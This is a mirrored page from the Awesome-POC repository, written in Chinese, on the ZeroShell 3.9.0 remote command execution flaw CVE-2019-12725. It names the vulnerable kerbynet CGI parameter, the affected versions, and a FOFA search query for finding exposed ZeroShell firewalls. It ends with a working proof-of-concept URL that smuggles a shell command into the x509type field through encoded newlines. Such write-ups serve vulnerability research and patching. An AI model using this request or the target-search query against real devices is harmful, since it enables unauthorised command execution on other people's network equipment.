admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 03:44:10 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/网络设备漏洞/ZeroShell 3.9.0 远程命令执行漏洞 CVE-2019-12725.md
Threekiii e9e1a4597a init
2022-02-20 17:08:56 +08:00

615 B
Raw Blame History

ZeroShell 3.9.0 远程命令执行漏洞 CVE-2019-12725

漏洞描述

ZeroShell 3.9.0 存在命令执行漏洞,/cgi-bin/kerbynet 页面x509type 参数过滤不严格,导致攻击者可执行任意命令

漏洞影响

ZeroShell < 3.9.0

FOFA

app="Zeroshell-防火墙"

漏洞复现

登录页面如下

验证的POC为

/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0Aid%0A%27